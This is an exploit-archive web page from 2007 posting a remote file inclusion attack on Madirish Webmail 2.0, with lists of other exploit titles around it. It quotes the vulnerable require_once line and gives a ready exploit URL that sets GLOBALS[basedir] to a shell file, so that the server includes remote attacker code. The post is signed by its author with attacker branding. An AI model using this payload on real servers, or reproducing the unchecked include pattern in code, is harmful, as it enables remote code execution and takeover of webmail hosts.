exploits , vulnerabilities , articles , Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln

2006-05-25 V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability
2006-02-25 iGENUS WebMail <= 2.0.2 (config_inc.php) Remote Code Execution Exploit
2006-02-23 NOCC Webmail <= 1.0 (Local Inclusion) Remote Code Execution Exploit
2003-11-19 IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
2003-05-05 CommuniGatePro webmail version 4.0.6 session hijacking exploit

2007-06-07

Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln

Rated as : High Risk

###########################################################

Madirish Webmail v2.0  Remote File Include Vulnerabilities

Author : BoZKuRTSeRDaR

Contact MSN:BoZKuRTSeRDaR@BoZKuRTSeRDaR.CoM

My Homepage :WwW.Turkmilliyetcileri.OrG

script Download : http://sourceforge.net/projects/madirishwebmail

###############################################################################

code:
require_once($GLOBALS['basedir']."lib/sql.php")

exploit:

http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?
securitydot.net - 2007-06-07

Exploits - newest 10 RSS | More

2007-06-15 48882 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 27765 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 34817 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 25772 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 16828 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 14135 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 16642 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 14183 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 29467 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 14679 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit